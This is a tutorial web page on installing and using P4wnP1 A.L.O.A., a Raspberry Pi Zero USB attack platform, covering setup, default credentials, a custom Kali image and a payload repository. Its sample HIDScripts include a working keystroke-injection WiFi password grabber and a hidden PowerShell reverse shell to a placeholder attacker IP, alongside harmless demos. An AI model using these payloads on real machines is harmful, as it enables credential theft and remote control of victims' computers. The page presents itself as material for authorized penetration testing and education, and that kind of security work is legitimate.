Nerd or Geek Logo
Home / Projects / P4wnP1 A.L.O.A.

P4wnP1 A.L.O.A.

Highly customizable USB attack platform for Raspberry Pi Zero & Zero W

Tutorial Raspberry Pi Offensive Security USB HID
P4wnP1 A.L.O.A. logo

Overview

P4wnP1 A.L.O.A. (A Little Offensive Application) is an open-source, highly customizable USB attack platform designed for the Raspberry Pi Zero and Zero W. It transforms your tiny Pi into a powerful security testing tool capable of emulating various USB devices.

Key Capabilities

USB HID Emulation

Emulate keyboards, mice, and composite devices for automated input attacks and payload delivery.

USB Ethernet

Create virtual network interfaces using RNDIS (Windows) and ECM (macOS/Linux) for network-based attacks.

Payload Execution

Execute automated scripts and payloads with precise timing and conditional logic.

Web Configuration

Full web-based interface for live configuration, payload management, and device control.

Typical Use Cases

  • Security Research: Test USB-based attack vectors and defenses
  • Red Team Testing: Physical penetration testing and social engineering assessments
  • USB Device Emulation Labs: Educational environments for learning USB security
  • Automation: Automated keyboard input for repetitive tasks

Supported Hardware

Compatible Devices: Raspberry Pi Zero and Raspberry Pi Zero W only. The standard Raspberry Pi models (3, 4, 5) are not supported due to USB OTG requirements.

Features

Modular USB Gadget

Flexible USB gadget framework supporting multiple device types simultaneously.

Web UI

Intuitive web interface for real-time configuration and monitoring.

Scriptable Payloads

JavaScript-based payload system with full access to device capabilities.

Network Attacks

Built-in support for network interception and manipulation.

Headless Operation

Runs completely headless - no monitor, keyboard, or mouse required.

Community Payloads

Access community-maintained payloads and extensions.

Estimated Setup Time

15–30 minutes
  • Image download: 5-10 minutes (depending on connection)
  • Flashing SD card: 5-10 minutes
  • First boot and access: 2-5 minutes

Prerequisites

Ensure you have all necessary hardware and software before starting the installation.

Required Hardware

  • Raspberry Pi Zero or Raspberry Pi Zero W
  • MicroSD card (8 GB or larger recommended)
  • SD card reader (USB or built-in)
  • Micro-USB cable capable of data + power

Required Software

  • Raspberry Pi Imager (or balenaEtcher)
  • A computer running Windows, macOS, or Linux
  • Web browser for accessing the interface
Important: Use the USB data port on the Pi Zero, not the power-only port. The data port is the one closest to the center of the board.

Installation Guide

Follow these steps to set up P4wnP1 A.L.O.A. on your Raspberry Pi Zero.

1

Obtain the Image

Download the latest P4wnP1 A.L.O.A. image from the official GitHub Releases page.

Download from GitHub Releases
2

Flash the SD Card

Use Raspberry Pi Imager or balenaEtcher to flash the downloaded image to your microSD card.

  1. Open Raspberry Pi Imager
  2. Click "Choose OS" → "Use custom" and select the P4wnP1 image
  3. Select your SD card as the storage device
  4. Click "Write" and wait for completion
  5. Safely eject the SD card after flashing
3

Hardware Setup

Prepare your Raspberry Pi Zero for first boot.

  1. Insert the microSD card into the Raspberry Pi Zero
  2. Connect the Pi to your computer using the USB data port (not the power-only port)
4

First Boot

Allow the device to boot and configure itself.

  • The Pi will boot and initialize (allow 1-2 minutes)
  • The device will enumerate as a USB HID and/or USB network device
  • Your computer should detect a new network adapter
5

Access the Device

Connect to P4wnP1 using the default credentials.

Default Credentials 
Username: pi
Password: raspberry
Web UI: http://172.16.0.1:8000 (or http://172.24.0.1:8000)

Web Interface Overview

The P4wnP1 web interface provides complete control over all device functions.

Dashboard

Overview of current device status, active gadgets, and quick actions.

USB Gadget Settings

Configure USB device emulation modes (HID, network, mass storage).

Payload Management

Create, edit, and deploy HIDScripts and trigger payloads.

Network Settings

Configure WiFi (on Zero W), USB Ethernet, and network triggers.

Logs & Status

View system logs, payload execution results, and debug information.

System Settings

Manage templates, backup/restore configurations, and system updates.

Basic Usage

Enabling HID Keyboard Payloads

  1. Navigate to the web interface at http://172.16.0.1:8000
  2. Go to USB Settings and ensure HID Keyboard is enabled
  3. Navigate to HIDScript section
  4. Select or create a payload script
  5. Click Run to execute the payload

Running a Sample Payload

JavaScript (HIDScript) 
// Simple Hello World payload
layout("us");               // Set keyboard layout
typingSpeed(100, 150);      // Random delay between keystrokes

press("GUI r");             // Open Run dialog (Windows)
delay(500);
type("notepad");
press("ENTER");
delay(1000);
type("Hello from P4wnP1!");

Switching USB Modes

P4wnP1 supports multiple USB gadget configurations:

  • HID Only: Keyboard/mouse emulation
  • RNDIS + HID: Network adapter + keyboard (Windows)
  • ECM + HID: Network adapter + keyboard (macOS/Linux)
  • Mass Storage: USB drive emulation

Saving Configurations

Use the Templates feature to save and load complete device configurations including USB settings, WiFi configuration, and trigger actions.

Sample Scripts

Get started quickly with these ready-to-use HIDScript examples. Click the button below to view sample payloads.

Custom Kali Linux Image

For a pre-configured, ready-to-use experience, check out NightRang3r's custom P4wnP1 Kali Linux 2023.1 image for Raspberry Pi Zero W.

Requirement: A 16GB SD card is required for both versions of the image. The image is compressed with xz - use 7zip to extract it.

Image Versions

Lite Version

P4wnP1-aloha-kali-linux-2023.1-raspberry-pi-zero-w-by-NightRang3r-1.1.0-lite.img.xz

Scripts are included but not installed or deployed. You'll need to manually copy them to the correct directories and setup triggers in the P4wnP1 UI.

Full Version

P4wnP1-aloha-kali-linux-2023.1-raspberry-pi-zero-w-by-NightRang3r-1.1.0.img.xz

All scripts, Raw HID scripts, and most HID scripts are included, installed, and configured. Ready to use immediately!

Key Features

Boot Config

Updated boot.txt and config.txt for P4wnP1 functionality.

Included Tools

Responder, Metasploit, Impacket, Nmap, Aircrack-ng, MDK4, MSFPC, and more.

Python Ready

Python 2 & 3 with spidev, Pillow, luma.lcd, luma.oled, RPi.GPIO pre-installed.

LCD/OLED Support

Modified LCD and OLED menu repositories included for hat displays.

Easy Expansion

raspi-config included for easy filesystem expansion.

Kali Binaries

Kali Windows binaries included for post-exploitation.

Directory Structure

File Paths 
# HID Scripts location
/usr/local/P4wnP1/HIDScripts

# Shell scripts location
/usr/local/P4wnP1/scripts

# Loot directory (accessible via browser)
/usr/local/P4wnP1/www/loot
# Browser access: http://172.XX.0.1:8000/loot/

Custom Image Installation

1

Download the Image

Get the image from one of these sources:

2

Extract & Flash

Extract the .xz file with 7zip, then flash to your SD card using Raspberry Pi Imager or balenaEtcher.

3

Connect to the Device

USB Gadget Mode

  • SSH: 172.16.0.1:22
  • Web UI: http://172.16.0.1:8000

WiFi AP Mode

  • SSID: 💥🖥💥 Ⓟ➃ⓌⓃ🅟❶
  • SSH: 172.24.0.1:22
  • Web UI: http://172.24.0.1:8000
  • WiFi Key: MaMe82-P4wnP1

Credentials: root:toor

4

Expand Filesystem

Run the following command and reboot to use the full SD card size:

Bash 
raspi-config --expand-rootfs
sudo reboot
5

LCD/OLED Setup (Optional)

If you have a display hat, navigate to the corresponding directory and run the installer:

Bash 
cd /root/P4wnP1_ALOA_LCD_MENU  # or OLED_MENU_V2
./install.sh
6

Setup Startup Menu

Create a new trigger action when service starts:

  1. Go to P4wnP1 Web UI → Trigger Actions
  2. Add new trigger: "When service starts"
  3. Action: Run bash script
  4. Select: /usr/local/P4wnP1/scripts/runmenu.sh
  5. Save to startup template

P4wnP1-A.L.O.A. Payloads Repository

A comprehensive collection of tested and verified scripts for Windows, macOS, and Raw HID attacks. These payloads are adapted to work with the custom P4wnP1 image.

Pre-included: This repository is pre-included in the root directory of the custom image. Run git pull occasionally to get the latest updates.

Payload Categories

Windows Scripts

PowerShell and batch scripts for Windows targets.

macOS Scripts

Shell scripts and AppleScript payloads for OSX.

HIDScripts

JavaScript-based keyboard injection scripts.

Raw HID Attacks

Low-level HID device attack scripts.

Network Attacks

RNDIS/ECM based network exploitation.

Loot Collection

Auto-exfiltration to browsable loot directory.

Compatibility Note: If using this repository with a different image, you may need to make adjustments to the scripts for compatibility. Check the comments inside each file for usage and requirements.

Quick Update

Bash 
# Navigate to payloads directory
cd /root/P4wnP1-A.L.O.A.-Payloads

# Pull latest updates
git pull

Security & Legal Notice

Important Legal Disclaimer

P4wnP1 is intended for authorized security testing and educational use only. Unauthorized access to computer systems is illegal in most jurisdictions.

  • Only use on systems you own or have explicit permission to test
  • Users are responsible for complying with all applicable laws and policies
  • Document all testing activities and obtain written authorization
  • The developers and this guide assume no liability for misuse

Troubleshooting

Common issues and their solutions.

Device not detected over USB

  • Ensure you're using the data port, not the power-only port
  • Try a different USB cable (some are power-only)
  • Allow 1-2 minutes for initial boot
  • Check Device Manager (Windows) or System Report (macOS) for the device

Web UI not reachable

  • Ensure the USB network adapter is properly configured
  • Try both http://172.16.0.1:8000 and http://172.24.0.1:8000
  • Check that your firewall isn't blocking the connection
  • Verify the network adapter has obtained an IP address

Wrong USB port used

The Raspberry Pi Zero has two micro-USB ports:

  • Data port (inner): Use this one - it's closer to the center of the board
  • Power port (outer): This is power-only and won't work for data

SD card flashing issues

  • Use a high-quality SD card (Class 10 or better)
  • Try a different card reader
  • Format the SD card before flashing
  • Download the image again (may be corrupted)
  • Try balenaEtcher if Raspberry Pi Imager fails

Payloads not executing correctly

  • Verify the correct keyboard layout is set (layout("us"))
  • Increase delays between commands
  • Check for syntax errors in your HIDScript
  • Ensure the target system is ready (logged in, focused window)

Resources

Additional documentation, tools, and community resources.

GitHub Repository

Source code, releases, issues, and contribution guidelines.

View Repository

Wiki & Documentation

Payload creation, advanced configuration, and customization.

Read the Wiki

Raspberry Pi Imager

Official imaging tool for flashing SD cards.

Download Imager

Sample HIDScripts

A simple script that opens Notepad and types a message. Great for testing your setup.

JavaScript 
// Hello World - Test Script
layout("us");
typingSpeed(100, 150);

// Open Run dialog
press("GUI r");
delay(500);

// Open Notepad
type("notepad");
press("ENTER");
delay(1000);

// Type message
type("Hello from P4wnP1 A.L.O.A.!");
press("ENTER");
type("Your USB attack platform is working correctly.");

Opens a browser and plays "Never Gonna Give You Up" - classic harmless prank.

JavaScript 
// Rickroll Script
layout("us");
typingSpeed(80, 120);

// Open Run dialog
press("GUI r");
delay(500);

// Open browser with YouTube video
type("https://www.youtube.com/watch?v=dQw4w9WgXcQ");
press("ENTER");
delay(2000);

// Fullscreen (F key on YouTube)
press("f");

Extracts saved WiFi passwords from Windows. Use only on authorized systems!

JavaScript 
// WiFi Password Grabber (Windows)
// WARNING: Only use on systems you own or have permission to test!
layout("us");
typingSpeed(50, 100);

// Open PowerShell as Admin
press("GUI x");
delay(300);
press("a");
delay(500);
press("LEFT");
press("ENTER");
delay(2000);

// Export WiFi profiles
type("(netsh wlan show profiles) | Select-String '\\:(.+)$' | ");
type("%{$name=$_.Matches.Groups[1].Value.Trim(); $_} | ");
type("%{(netsh wlan show profile name=\"$name\" key=clear)} | ");
type("Out-File -FilePath $env:TEMP\\wifi.txt");
press("ENTER");
delay(2000);

// Open the file
type("notepad $env:TEMP\\wifi.txt");
press("ENTER");

Creates a reverse shell connection. EDUCATIONAL ONLY - Use responsibly!

JavaScript 
// Reverse Shell (PowerShell - Windows)
// WARNING: This is for authorized penetration testing ONLY!
// Replace IP and PORT with your listener
layout("us");
typingSpeed(30, 60);

var attackerIP = "YOUR_IP_HERE";
var attackerPort = "4444";

// Open hidden PowerShell
press("GUI r");
delay(300);
type("powershell -w hidden -ep bypass");
press("ENTER");
delay(1000);

// Reverse shell one-liner
type("$c=New-Object Net.Sockets.TCPClient('" + attackerIP + "'," + attackerPort + ");");
type("$s=$c.GetStream();[byte[]]$b=0..65535|%{0};");
type("while(($i=$s.Read($b,0,$b.Length)) -ne 0){;");
type("$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);");
type("$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';");
type("$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}");
press("ENTER");

Downloads and sets a custom wallpaper on Windows.

JavaScript 
// Wallpaper Changer (Windows)
layout("us");
typingSpeed(40, 80);

var imageUrl = "https://example.com/wallpaper.jpg";

// Open PowerShell
press("GUI r");
delay(300);
type("powershell -ep bypass");
press("ENTER");
delay(1000);

// Download and set wallpaper
type("$url = '" + imageUrl + "'; ");
type("$path = \"$env:TEMP\\wall.jpg\"; ");
type("Invoke-WebRequest -Uri $url -OutFile $path; ");
type("Add-Type -TypeDefinition @\"");
press("ENTER");
type("using System.Runtime.InteropServices;");
press("ENTER");
type("public class Wallpaper {");
press("ENTER");
type("[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]");
press("ENTER");
type("public static extern int SystemParametersInfo(int a, int b, string c, int d);");
press("ENTER");
type("}");
press("ENTER");
type("\"@; ");
type("[Wallpaper]::SystemParametersInfo(20, 0, $path, 3)");
press("ENTER");

delay(500);
type("exit");
press("ENTER");